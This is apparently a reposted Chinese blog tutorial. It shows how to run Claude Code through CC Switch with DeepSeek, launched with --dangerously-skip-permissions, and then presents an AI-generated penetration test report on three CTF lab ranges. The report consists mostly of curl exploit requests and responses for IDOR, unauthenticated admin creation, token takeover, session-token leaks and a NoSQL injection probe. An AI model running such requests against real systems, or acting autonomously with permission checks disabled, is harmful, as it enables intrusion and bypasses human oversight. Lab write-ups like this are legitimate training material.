新手必看!一键搞定ClaudeCode,还能让DeepSeek带你自动化渗透测试?

admin 2026-07-12 04:51:29 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍了一套面向新手的自动化渗透测试方案,使用ClaudeCode、CCSwitch和DeepSeekV4pro。通过一键安装工具解决环境配置难题,配置本地路由中转站连接DeepSeekAPI,并利用BAT脚本启动ClaudeCode。文章展示了在三个靶场中利用API配置泄露、弱口令、IDOR等漏洞自动完成攻击链并生成渗透测试报告的过程,提供了可操作部署步骤。 综合评分: 91 文章分类: 渗透测试,红队,漏洞分析,内网渗透,安全工具


cover_image

新手必看!一键搞定 Claude Code,还能让 DeepSeek 带你自动化渗透测试?

原创

Des Des

教红队的Des

2026年7月8日 10:00 青海

在小说阅读器读本章

去阅读

大家好,我是Des

近期,Claude code + CC Switch + DeepSeek V4 pro的Agent挖洞方案 以及基于C2 自动化横向内网的文章深受大家喜爱,于是Des师傅给大家出一篇能够让新手快熟上手的教程,五分钟带你部署整套Agent渗透方案。

很多朋友在本地部署时,往往会遇到Node.js 环境配置、权限报错、以及 API 访问的问题。而且,由于地域限制和支付门槛,直接用 Claude 官方 API 对很多国内开发者来说并不友好。

今天,我给大家分享一套极速部署方案:Claude Code + CC Switch + DeepSeek。这套方案不仅解决了安装难题,还能让你用上 DeepSeek 的合规 API,并且如果你懂一点安全,它甚至能自动帮你完成漏洞挖掘和报告生成!


第一步:一键安装,告别环境折腾

通常情况下,我们要先装 Node.js,再配环境变量,然后再用 npm 安装 claude,期间可能还会遇到各种权限错误。

但在今天这套方案里,我们不需要那么麻烦。

下载并启动工具:直接下载“Claude Code 一键安装卸载工具 v2.3.0”。

环境检测:打开软件,它会自动检测你的 Windows 版本、网络状态和磁盘空间(图 1)。

组件管理:点击对应的“安装”按钮,工具会自动帮你完成Nodejs v24.15.0、Claude Code以及CC Switch的下载、解压和配置(图 2)。

排雷提示:注意看图 2 的日志区域,如果安装时出现CCSWITCH_EXE is not defined的报错,不用慌张。这通常只是某个钩子未执行完,只要 Node.js 和 Claude Code 显示“已安装”状态,就可以继续下一步。全部安装效果如下杀毒软件可能会拦截powershell导致安装失败

第二步:配置 CC Switch 路由与 DeepSeek

为了让 Claude Code 能稳定连接到 DeepSeek 的 API,我们需要配置CC Switch作为“本地路由中转站”。

打开 CC Switch 设置:点击界面左上角的齿轮图标,进入设置页面

开启本地路由:在“路由”选项卡中,确保“本地路由”状态为“运行中”,并打开“路由总开关”。

添加 DeepSeek 供应商:

启动路由:回到主页面,将 Claude 的开关打开(图 4)。此时你的本地已经搭建好了代理服务。

第三步:便捷启动 Claude Code

你会发现,直接在 CMD 里输入claude可能会遇到–dangerously-skip-permissions报错,导致无法运行。

这里分享一个小技巧(图 7):新建一个文本文档,命名为start_claude.bat,写入以下内容:

@echo off

cd /d %~dp0

claude –dangerously-skip-permissions

pause

保存后双击这个 BAT 文件,就能直接打开 Claude Code 的交互式界面了(图 8)。

初次启动有惊喜!你会看到:

Opus 4.7 (1M context):巨大的上下文,直接把项目代码拖进去都不怕。

Welcome back!:具有非常友好的提示语,输入/init可以快速生成项目配置文档。

第四步:高光时刻 – AI 自动渗透测试

这套工具的魅力不止于写代码。结合 CC Switch 的接口兼容性,你还可以让 Claude Code 配合相应的 MCP (Model Context Protocol) 插件执行自动化任务。

看看图中的实战成果(图 9):三个靶场全部拿下,FLAG 全到手!

Range1 (大坝监控):通过 API 配置泄漏,最终利用未授权创建管理员用户拿到了 Flag。

Range2 (SafeChat):通过信息泄漏配合弱口令登录,拿到了后台 Dashboard 权限。

Range3 (电商平台):利用参数遍历漏洞,成功提取 Session 隐藏记录。

系统不仅自动完成了攻击链,还自动生成了包含 4 张截图和完整攻击路径的 Markdown 渗透测试报告!这在传统的渗透测试中,需要耗费安全工程师大量的精力去整理,而现在 AI 可以在几分钟内完成。

靶场综合渗透测试报告

测试日期:2026-07-07目标网络:192.168.80.149


Range1:安全管理监控信息系统

目标信息

| 字段 | 值 | | — | — | | 前端 | http://192.168.80.149:8001 | | API | http://192.168.80.149:8002 | | 技术栈 | Vue 3 + Flask + MySQL 5.7 | | API 框架 | Werkzeug 3.1.8 / Python 3.9.25 |

漏洞 1:任意用户信息泄露(IDOR)

端点:GET /api/user/{id}

未授权访问,遍历用户 ID 即可获取所有用户敏感信息。

curl-shttp://192.168.80.149:8002/api/user/1

泄露数据(4 个用户):

| ID | 用户名 | 角色 | 邮箱 | 密码哈希 | | — | — | — | — | — | | 1 | admin | admin | [email protected] | pbkdf2:sha256:260000$admin123$hash… | | 2 | testuser | user | [email protected] | pbkdf2:sha256:260000$test123$hash… | | 3 | manager | manager | [email protected] | pbkdf2:sha256:260000$mgr123$hash… | | 4 | guest | user | [email protected] | pbkdf2:sha256:260000$guest123$hash… |

漏洞 2:系统配置信息泄露

端点:GET /api/config

curl-shttp://192.168.80.149:8002/api/config

响应:

{

“code”:200,

“data”: {

“apiDocs”:”/webapi/v2/docs”,

“dbHost”:”db”,

“dbName”:”testdb”,

“dbUser”:”testuser”,

“debugMode”:true,

“version”:”v2.0.1″

}

}

泄露了数据库主机、库名、用户名及调试模式状态。

漏洞 3:用户列表未授权访问

端点:GET /api/user/list

curl-shttp://192.168.80.149:8002/api/user/list

返回所有用户概要信息(4 用户),无需认证。

漏洞 4:订单列表未授权访问

端点:GET /api/order/list

curl-shttp://192.168.80.149:8002/api/order/list

返回所有订单记录,无需认证。

泄露数据示例:

| 订单ID | 产品 | 金额 | 用户ID | 状态 | | — | — | — | — | — | | 1 | Enterprise License | 9999.99 | 1 | completed | | 2 | Basic License | 99.99 | 2 | pending |

漏洞 5:未授权创建管理员用户 — FLAG 获取 ★★★

端点:POST /api/user

curl-s-XPOST http://192.168.80.149:8002/api/user \

-H”Content-Type: application/json”\

-d'{“username”:”exploit”,”password”:”test123″,”roleId”:”admin”}’

响应:

{

“code”:200,

“flag”:”FLAG{sw4gg3r_4pi_d0cs_l3ak_t0_4dd_us3r}”,

“msg”:”用户创建成功”

}

攻击路径总结

/api/config (配置泄露)

→ DB 连接信息 + API文档地址

/api/user/list (用户枚举)

→ 4 个用户列表

/api/user/{1-4} (IDOR)

→ 所有用户密码哈希泄露

/api/user POST (未授权创建用户)

→ FLAG{sw4gg3r_4pi_d0cs_l3ak_t0_4dd_us3r}

/api/order/list (订单泄露)

→ 订单信息未授权访问


Range2:SafeChat 安全通讯平台

目标信息

| 字段 | 值 | | — | — | | 前端 | http://192.168.80.149:8003 | | API | http://192.168.80.149:8004 | | 技术栈 | Vue 3 + Flask | | 用户数 | 5 |

漏洞 1:用户信息批量泄露

端点:GET /api/public/users

curl-shttp://192.168.80.149:8004/api/public/users

泄露数据(5 个用户):

| 用户名 | 真实姓名 | 部门 | 手机号 | 角色 | | — | — | — | — | — | | admin | 系统管理员 | 信息安全部 | 18888888888 | admin | | user001 | 张三 | 研发部 | 18888888889 | user | | user002 | 李四 | 运维部 | 18888888890 | user | | user003 | 王五 | 测试部 | 18888888891 | user | | manager | 项目经理 | 项目部 | 18888888892 | manager |

漏洞 2:弱口令 + 测试账号泄露

泄露位置:前端页面明文显示(登录页底部)

测试账号:admin / ComplexP@ss2024!

漏洞 3:密码登录 → Token 接管

利用:

curl-s-XPOST http://192.168.80.149:8004/api/public/login \

-H”Content-Type: application/json”\

-d'{“username”:”admin”,”password”:”ComplexP@ss2024!”}’

响应:

{

“success”:true,

“token”:”DW4I3k5DoQuRsLLF2bIQ8HfJM2wZeaW9cj91sRqegsY”,

“user”: {

“phone”:”18888888888″,

“realName”:”系统管理员”,

“role”:”admin”,

“username”:”admin”

}

}

漏洞 4:后台管理接口 — FLAG 获取

端点:GET /api/admin/dashboard(需 Bearer Token)

curl-shttp://192.168.80.149:8004/api/admin/dashboard \

-H”Authorization: Bearer DW4I3k5DoQuRsLLF2bIQ8HfJM2wZeaW9cj91sRqegsY”

Flag 响应:

FLAG{sms_vuln_cha1n_4ttack_success}

漏洞 5:后台管理用户列表

端点:GET /api/admin/users(需 Bearer Token)

返回完整用户管理列表,含手机、邮箱、部门等详细信息。

攻击路径总结

/api/public/users (信息泄露)

→ 5 个用户手机号、部门信息

前端页面测试账号泄露

→ admin / ComplexP@ss2024!

/api/public/login (密码登录)

→ Bearer Token 获取

/api/admin/dashboard (后台API)

→ FLAG{sms_vuln_cha1n_4ttack_success}

/api/admin/users (后台用户管理)

→ 全量用户数据


Range3:电商平台管理系统

目标信息

| 字段 | 值 | | — | — | | 前端 | http://192.168.80.149:8005 | | API | http://192.168.80.149:8006 | | 技术栈 | Vue 3 + Flask | | API 版本 | v1.0 |

漏洞 1:全量数据导出未授权

端点:GET /api/export?type=all

curl-shttp://192.168.80.149:8006/api/export?type=all

支持类型:all,users,orders,products,sessions

所有数据无需任何认证即可导出,约 10KB 数据量。

漏洞 2:全局搜索接口未授权

端点:GET /api/search?keyword={keyword}&type={type}

curl-s”http://192.168.80.149:8006/api/search?keyword=a&type=all”

支持类型:users,orders,products,all

泄露数据量:20 个用户 + 23 个商品 + 23 个订单

用户数据(20 条):

| ID | 用户名 | 角色 | 部门 | 手机号 | 邮箱 | | — | — | — | — | — | — | | 1 | admin | admin | 技术部 | 13800138001 | [email protected] | | 2 | zhangsan | user | 销售部 | 13800138002 | [email protected] | | … | … | … | … | … | … |

商品数据(23 条):

| ID | 名称 | 品牌 | 分类 | 价格 | 库存 | | — | — | — | — | — | — | | 1 | MacBook Pro 14″ | Apple | 笔记本 | ¥12,999 | 50 | | 3 | iPad Pro 11″ | Apple | 平板 | ¥8,999 | 80 | | … | … | … | … | … | … |

订单数据(23 条,关联用户ID):

| ID | 产品 | 金额 | 用户ID | 状态 | | — | — | — | — | — | | 1 | MacBook Pro | ¥12,999 | 1 | completed | | 3 | iPad Pro | ¥8,999 | 3 | pending | | … | … | … | … | … |

漏洞 3:Session Token 泄露

端点:GET /api/sessions?user_id=1&status=active

curl-s”http://192.168.80.149:8006/api/sessions?user_id=1&status=active”

响应:

{

“data”: [{

“id”:1, “user_id”:1, “username”:”admin”,

“token”:”admin_token_abc123″,

“device”:”MacBook Pro”, “ip”:”192.168.1.100″,

“loginTime”:”2024-01-01 10:00:00″,

“status”:”active”

}],

“success”:true

}

管理员的有效 Session Tokenadmin_token_abc123被直接泄露,可劫持管理员会话。

漏洞 4:Session 参数组合遍历 — FLAG 获取 ★★★

端点:GET /api/sessions?session_id=6&user_id=1&status=super

需要特定的参数组合(session_id=6, user_id=1, status=super)才能触发隐藏 FLAG 返回。

curl-s”http://192.168.80.149:8006/api/sessions?session_id=6&user_id=1&status=super”

响应:

{

“data”: {

“id”:6, “user_id”:1, “username”:”admin”,

“token”:”admin_flag_session_xyz789″,

“flag”:”FLAG{fuzz_p4ram3t3r5_s3ss10n_l1st_ch4ll}”,

“device”:”Internal System”,

“status”:”super”

}

}

漏洞 5:NoSQL 注入探测

登录接口对$regex操作符处理不当,返回不同错误信息,存在用户枚举风险:

NoSQL 注入测试

curl-s-XPOST http://192.168.80.149:8006/api/login \

-H”Content-Type: application/json”\

-d'{“username”:{“$regex”:”.*”},”password”:{“$regex”:”.*”}}’

返回: “用户不存在”(传统JSON返回”密码错误”)

攻击路径总结

无需认证

├── /api/export?type=all → 全量数据导出(用户/订单/商品/Session)

├── /api/search?keyword=a → 全量搜索(20用户+23商品+23订单)

└── /api/sessions?user_id=1 → admin session token 泄露

└── admin_token_abc123 → 管理员会话劫持


FLAG 汇总

| 靶场 | FLAG | 获取方式 | | — | — | — | | Range1 | FLAG{sw4gg3r_4pi_d0cs_l3ak_t0_4dd_us3r} | POST /api/user 未授权创建用户 | | Range2 | FLAG{sms_vuln_cha1n_4ttack_success} | 弱口令登录 → 后台Dashboard | | Range3 | FLAG{fuzz_p4ram3t3r5_s3ss10n_l1st_ch4ll} | Session接口参数遍历组合 |

综合统计

| 靶场 | 漏洞数 | 严重程度 | 最高危漏洞 | | — | — | — | — | | Range1 | 5 | 高危 | API未授权创建管理员用户 | | Range2 | 5 | 高危 | 弱口令 → 后台接管 | | Range3 | 5 | 严重 | 全量API无认证 + Session Token泄露 + 参数绕过 |


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:教红队的Des Des Des《新手必看!一键搞定 Claude Code,还能让 DeepSeek 带你自动化渗透测试?》

评论:0   参与:  0